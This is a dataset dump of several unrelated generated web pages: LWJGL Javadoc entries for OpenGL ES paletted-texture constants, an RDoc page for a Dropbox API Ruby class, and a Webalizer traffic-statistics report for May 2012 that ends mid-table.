HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE4_RGB5_A1_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE8_RGB8_OES"><!-- --></A><H3> GL_PALETTE8_RGB8_OES</H3> <PRE> public static final int <B>GL_PALETTE8_RGB8_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE8_RGB8_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE8_RGBA8_OES"><!-- --></A><H3> GL_PALETTE8_RGBA8_OES</H3> <PRE> public static final int <B>GL_PALETTE8_RGBA8_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE8_RGBA8_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE8_R5_G6_B5_OES"><!-- --></A><H3> GL_PALETTE8_R5_G6_B5_OES</H3> <PRE> public static final int <B>GL_PALETTE8_R5_G6_B5_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE8_R5_G6_B5_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE8_RGBA4_OES"><!-- --></A><H3> GL_PALETTE8_RGBA4_OES</H3> <PRE> public static final int <B>GL_PALETTE8_RGBA4_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE8_RGBA4_OES">Constant Field Values</A></DL> </DL> <HR> <A NAME="GL_PALETTE8_RGB5_A1_OES"><!-- --></A><H3> GL_PALETTE8_RGB5_A1_OES</H3> <PRE> public static final int <B>GL_PALETTE8_RGB5_A1_OES</B></PRE> <DL> <DD>Accepted by the &lt;internalformat&gt; paramter of CompressedTexImage2D <P> <DL> <DT><B>See Also:</B><DD><A HREF="../../../constant-values.html#org.lwjgl.opengles.OESCompressedPalettedTexture.GL_PALETTE8_RGB5_A1_OES">Constant Field Values</A></DL> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/OESCompressedPalettedTexture.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../org/lwjgl/opengles/OESCompressedETC1RGB8Texture.html" title="class in org.lwjgl.opengles"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../org/lwjgl/opengles/OESDepth24.html" title="class in org.lwjgl.opengles"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?org/lwjgl/opengles/OESCompressedPalettedTexture.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="OESCompressedPalettedTexture.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;<A HREF="#field_summary">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#methods_inherited_from_class_java.lang.Object">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;<A HREF="#field_detail">FIELD</A>&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;METHOD</FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright &#169; 2002-2009 lwjgl.org. All Rights Reserved.</i> </BODY> </HTML>
jmcomets/tropical-escape
lib/lwjgl/javadoc/org/lwjgl/opengles/OESCompressedPalettedTexture.html
HTML
mit
17,606
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>class DropboxApi::Endpoints::Sharing::RevokeSharedLink - RDoc Documentation</title> <script type="text/javascript"> var rdoc_rel_prefix = "../../../"; var index_rel_prefix = "../../../"; </script> <script src="../../../js/jquery.js"></script> <script src="../../../js/darkfish.js"></script> <link href="../../../css/fonts.css" rel="stylesheet"> <link href="../../../css/rdoc.css" rel="stylesheet"> <body id="top" role="document" class="class"> <nav role="navigation"> <div id="project-navigation"> <div id="home-section" role="region" title="Quick navigation" class="nav-section"> <h2> <a href="../../../index.html" rel="home">Home</a> </h2> <div id="table-of-contents-navigation"> <a href="../../../table_of_contents.html#pages">Pages</a> <a href="../../../table_of_contents.html#classes">Classes</a> <a href="../../../table_of_contents.html#methods">Methods</a> </div> </div> <div id="search-section" role="search" class="project-section initially-hidden"> <form action="#" method="get" accept-charset="utf-8"> <div id="search-field-wrapper"> <input id="search-field" role="combobox" aria-label="Search" aria-autocomplete="list" aria-controls="search-results" type="text" name="search" placeholder="Search" spellcheck="false" title="Type to search, Up and Down to navigate, Enter to load"> </div> <ul id="search-results" aria-label="Search Results" aria-busy="false" aria-expanded="false" aria-atomic="false" class="initially-hidden"></ul> </form> </div> </div> <div id="class-metadata"> <div id="parent-class-section" class="nav-section"> <h3>Parent</h3> <p class="link"><a href="../Rpc.html">DropboxApi::Endpoints::Rpc</a> </div> </div> </nav> <main role="main" aria-labelledby="class-DropboxApi::Endpoints::Sharing::RevokeSharedLink"> <h1 id="class-DropboxApi::Endpoints::Sharing::RevokeSharedLink" class="class"> class DropboxApi::Endpoints::Sharing::RevokeSharedLink </h1> <section class="description"> </section> <section id="5Buntitled-5D" class="documentation-section"> <section class="constants-list"> <header> <h3>Constants</h3> </header> <dl> <dt id="ErrorType">ErrorType <dd> <dt id="Method">Method <dd> <dt id="Path">Path <dd> <dt id="ResultType">ResultType <dd> </dl> </section> </section> </main> <footer id="validator-badges" role="contentinfo"> <p><a href="https://validator.w3.org/check/referer">Validate</a> <p>Generated by <a href="https://ruby.github.io/rdoc/">RDoc</a> 6.0.1. <p>Based on <a href="http://deveiate.org/projects/Darkfish-RDoc/">Darkfish</a> by <a href="http://deveiate.org">Michael Granger</a>. </footer>
Jesus/dropbox_api
doc/DropboxApi/Endpoints/Sharing/RevokeSharedLink.html
HTML
mit
3,058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- Generated by The Webalizer Ver. 2.01-10 --> <!-- --> <!-- Copyright 1997-2000 Bradford L. Barrett --> <!-- (brad@mrunix.net http://www.mrunix.net) --> <!-- --> <!-- Distributed under the GNU GPL Version 2 --> <!-- Full text may be found at: --> <!-- http://www.mrunix.net/webalizer/ --> <!-- --> <!-- Give the power back to the programmers --> <!-- Support the Free Software Foundation --> <!-- (http://www.fsf.org) --> <!-- --> <!-- *** Generated: 04-Oct-2012 23:43 EDT *** --> <HTML> <HEAD> <TITLE>Usage Statistics for johnnyedickcom.ipage.com - May 2012</TITLE> </HEAD> <BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"> <H2>Usage Statistics for johnnyedickcom.ipage.com</H2> <SMALL><STRONG> Summary Period: May 2012<BR> Generated 04-Oct-2012 23:43 EDT<BR> </STRONG></SMALL> <CENTER> <HR> <P> <SMALL> <A HREF="#DAYSTATS">[Daily Statistics]</A> <A HREF="#HOURSTATS">[Hourly Statistics]</A> <A HREF="#TOPURLS">[URLs]</A> <A HREF="#TOPENTRY">[Entry]</A> <A HREF="#TOPEXIT">[Exit]</A> <A HREF="#TOPSITES">[Sites]</A> <A HREF="#TOPREFS">[Referrers]</A> <A HREF="#TOPSEARCH">[Search]</A> <A HREF="#TOPAGENTS">[Agents]</A> <A HREF="#TOPCTRYS">[Countries]</A> </SMALL> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH COLSPAN=3 ALIGN=center BGCOLOR="#C0C0C0">Monthly Statistics for May 2012</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Hits</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>5104</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Files</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>3149</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Pages</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>2357</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Visits</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>294</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total KBytes</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>122148</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique Sites</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>208</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique URLs</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>154</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique Referrers</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>35</B></FONT></TD></TR> <TR><TD WIDTH=380><FONT SIZE="-1">Total Unique User Agents</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>23</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH WIDTH=380 BGCOLOR="#C0C0C0"><FONT SIZE=-1 COLOR="#C0C0C0">.</FONT></TH> <TH WIDTH=65 BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE=-1>Avg </FONT></TH> <TH WIDTH=65 BGCOLOR="#C0C0C0" ALIGN=right><FONT SIZE=-1>Max </FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD><FONT SIZE="-1">Hits per Hour</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>6</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>1293</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Hits per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>164</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>1368</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Files per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>101</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>250</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Pages per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>76</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>1312</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Visits per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>9</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>15</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">KBytes per Day</FONT></TD> <TD ALIGN=right WIDTH=65><FONT SIZE="-1"><B>3940</B></FONT></TD> <TD WIDTH=65 ALIGN=right><FONT SIZE=-1><B>9760</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH COLSPAN=3 ALIGN=center BGCOLOR="#C0C0C0"> <FONT SIZE="-1">Hits by Response Code</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD><FONT SIZE="-1">Code 200 - OK</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>3149</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 206 - Partial Content</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>9</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 302 - Found</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>2</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 304 - Not Modified</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>59</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 403 - Forbidden</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>35</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 404 - Not Found</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>1849</B></FONT></TD></TR> <TR><TD><FONT SIZE="-1">Code 500 - Internal Server Error</FONT></TD> <TD ALIGN=right COLSPAN=2><FONT SIZE="-1"><B>1</B></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="DAYSTATS"></A> <IMG SRC="daily_usage_201205.png" ALT="Daily usage for May 2012" HEIGHT=400 WIDTH=512><P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" COLSPAN=13 ALIGN=center>Daily Statistics for May 2012</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH ALIGN=center BGCOLOR="#C0C0C0"><FONT SIZE="-1">Day</FONT></TH> <TH ALIGN=center BGCOLOR="#008040" COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH ALIGN=center BGCOLOR="#0080FF" COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH ALIGN=center BGCOLOR="#00E0FF" COLSPAN=2><FONT SIZE="-1">Pages</FONT></TH> <TH ALIGN=center BGCOLOR="#FFFF00" COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH ALIGN=center BGCOLOR="#FF8000" COLSPAN=2><FONT SIZE="-1">Sites</FONT></TH> <TH ALIGN=center BGCOLOR="#FF0000" COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>199</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>168</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.34%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6362</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.21%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>105</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>97</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2205</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.81%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>121</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>103</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3863</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.16%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1664</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.36%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>100</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>79</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2253</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1316</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>181</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>150</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.40%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5878</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.81%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>204</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>164</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.91%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7351</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.02%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>127</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>118</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2874</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.35%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>283</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.54%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>250</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7753</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.35%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>609</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.50%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.37%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>264</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>167</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>139</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.40%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3327</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>99</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>89</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6227</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.10%</FONT></TD></TR> <TR><TD ALIGN=center><FONT 